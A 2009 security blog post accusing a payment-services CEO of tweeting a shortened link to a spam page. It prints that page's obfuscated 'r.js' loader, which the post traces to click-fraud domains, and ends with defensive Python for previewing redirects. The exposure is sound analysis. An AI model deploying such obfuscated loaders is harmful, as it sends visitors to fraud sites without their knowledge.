Retriever Software - Providing real time spamming via Twitter

Sun Jul 19 01:17:53 EDT 2009

@attritionorg


"We like to say that, yes, our technology is better, but it’s our people that make the difference." - Retriever Credit Card Services

Cliff Torrence is the Founder/President/CEO of Retriever Credit Card Services. If you believe their web page, they have 10 years of experience in security, compliance management and payment processing.


By "making the difference", apparently they mean the CEO is sending a shortened URL about USAA having a credit card breach. It seems clear that either his Twitter account has been compromised and someone is sending out links to further boost adword revenue, or he posts links to his Twitter feed without even reading them. Notice his tweet that uses a bit.ly shortened URL. This service, like every other one (except tinyurl.com), does not offer a native 'preview' method. You click a link and off you go to some page that you hope isn't BAD™. Twitter clients such as Twhirl do not allow you to preview, but Twitter's native search does. Unfortunately, about 803 billion people (true statistic!) use Twitter clients to read and click links, not the search page.


Looking at the URL Cliff Torrence expects his followers to read, you can see it is fishy: it ends at "zge021.myftpsite.net".

Clicking on that link loads a simple page with fun wording like "courteously, without my, Infestation Responsible For" and a jumble of text that vaguely resembles a blog post (by a 4-year-old monkey). This page also calls "r.js", which goes through some effort to obscure its purpose:

document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%20%66%75%6E%63%74%69%6F%6E%20%74%69%67%75%67%6C%6A%72%69%28%73%6C%6D%29%20%20%7B%20%20%20%20%76%61%72%20%20%20%6B%76%74%3D%75%6E%65%73%63%61%70%65%28%20%73%6C%6D%2E%73%75%62%73%74%72%28%20%30%2C%20%73%6C%6D%2E%6C%65%6E%67%74%68%2D%31%29%20%29%3B%20%20%76%61%72%20%73%64%6A%3D%27%27%3B%20%20%66%6F%72%28%74%3D%30%3B%20%20%74%3C%6B%76%74%2E%6C%65%6E%67%74%68%3B%74%2B%2B%29%20%20%73%64%6A%2B%3D%20%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%20%20%6B%76%74%2E%63%68%61%72%43%6F%64%65%41%74%28%74%29%2D%20%20%73%6C%6D%2E%73%75%62%73%74%72%28%20%73%6C%6D%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%20%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%20%20%75%6E%65%73%63%61%70%65%28%73%64%6A%29%29%3B%20%7D%20%20%3C%2F%73%63%72%69%70%74%3E'));tigugljri('%286FVFULSW%2853odqjxdjh%286G%2855mdydvfulsw%2855%286Hgrfxphqw1zulwh%285%3Bxqhvfdsh%285%3B%285%3A%28586F%285886%285876%285885%28587%3C%285883%285887%285853%285887%28588%3C%285883%285878%28586G%285855%2858%3A7%285898%2858%3A%3B%2858%3A7%28585I%28589D%285894%2858%3A9%285894%2858%3A6%285896%2858%3A5%28589%3C%2858%3A3%2858%3A7%285855%285853%285853%285886%285885%285876%28586G%285855%28589%3B%2858%3A7%2858%3A7%2858%3A3%28586D%28585I%28585I%2858%3A%3A%2858%3A%3A%2858%3A%3A%28585H%28589D%28589I%28589%3B%28589H%285898%285895%2858%3A5%28589%3C%28589F%28589I%28585H%285895%28589%3C%2858%3AD%28585I%285898%285895%2858%3A5%28589%3C%28589F%28589I%285855%28586H%285853%285853%28586F%28585I%285886%285876%285885%28587%3C%285883%285887%28586H%285%3A%285%3C%285%3C%286E%286F2VFULSW%286H%283D3');

Through painful decoding and following links, courtesy of Sullo, it turns out this is likely an elaborate keyword-based advertising revenue setup that ends at j0hnebril0.biz (partially obfuscated with zeros) and involves 0ffersfine.c0m and y0ufindm0re.c0m.

Long story short: Cliff Torrence and Retriever Credit Card Services should explain why they are posting this crap to their Twitter feed. Are they in on it and getting kickbacks from click-through fraud/scams/whatever?

As always, use preview.tinyurl.com for your URL shortening needs. Enable the 'preview' mode for all TinyURL links so you can see where a link leads before you follow it.
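For shorteners that offer no preview mode, the equivalent check is to ask the server where the link goes without fetching the landing page: send a HEAD request, read the Location header, and repeat hop by hop. The Python below is an added example (not the post's code and not tied to any shortener's API); FakeConnection and the *.invalid hostnames are constructed so it runs offline, and make_connection is the real http.client path you would use against a live link.

```python
"""Expand a shortened link one redirect hop at a time using HEAD requests, so
the landing page is never fetched or rendered. Added example, not from the
original post; FakeConnection and the *.invalid hosts are constructed."""
import http.client
from urllib.parse import urlsplit, urljoin

REDIRECT_STATUSES = {301, 302, 303, 307, 308}
MAX_HOPS = 5


def make_connection(netloc, scheme):
    """Real http.client connection (used when no fake is injected)."""
    cls = http.client.HTTPSConnection if scheme == 'https' else http.client.HTTPConnection
    return cls(netloc, timeout=10)


def resolve_once(url, connection_factory=make_connection):
    """Return the Location a single HEAD request is redirected to, or None."""
    parts = urlsplit(url)
    path = parts.path or '/'
    if parts.query:
        path += '?' + parts.query
    conn = connection_factory(parts.netloc, parts.scheme)
    try:
        conn.request('HEAD', path, headers={'User-Agent': 'link-preview/0.1'})
        resp = conn.getresponse()
        if resp.status not in REDIRECT_STATUSES:
            return None
        location = resp.getheader('Location')
        # Location may be relative; resolve it against the URL we asked for.
        return urljoin(url, location) if location else None
    finally:
        conn.close()


def expand_chain(url, connection_factory=make_connection, max_hops=MAX_HOPS):
    """Follow redirects by hand, recording every hop and stopping on loops."""
    chain = [url]
    for _ in range(max_hops):
        nxt = resolve_once(chain[-1], connection_factory)
        if nxt is None or nxt in chain:
            break
        chain.append(nxt)
    return chain


# --- constructed offline stand-in for http.client ---------------------------
FAKE_REDIRECTS = {
    ('short.invalid', '/abc'): (301, 'http://landing.invalid/go'),
    ('landing.invalid', '/go'): (302, '/final'),          # relative Location
    ('loop.invalid', '/a'): (302, 'http://loop.invalid/b'),
    ('loop.invalid', '/b'): (302, 'http://loop.invalid/a'),
}


class _FakeResponse:
    def __init__(self, status, location):
        self.status, self._location = status, location

    def getheader(self, name, default=None):
        return self._location if name.lower() == 'location' and self._location else default


class FakeConnection:
    """Answers HEAD requests from FAKE_REDIRECTS; anything else is a plain 200."""
    def __init__(self, netloc, scheme):
        self.netloc = netloc

    def request(self, method, path, headers=None):
        if method != 'HEAD':
            raise AssertionError('only HEAD is sent, never GET')
        self._key = (self.netloc, path)

    def getresponse(self):
        return _FakeResponse(*FAKE_REDIRECTS.get(self._key, (200, None)))

    def close(self):
        pass


if __name__ == '__main__':
    for hop in expand_chain('http://short.invalid/abc', FakeConnection):
        print(hop)
```

The hop limit and the loop check matter: redirect chains in this kind of setup bounce through several hosts, and a chain that never terminates should be reported as such rather than followed forever. Every host in the returned list is something to look up or block before anyone clicks.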

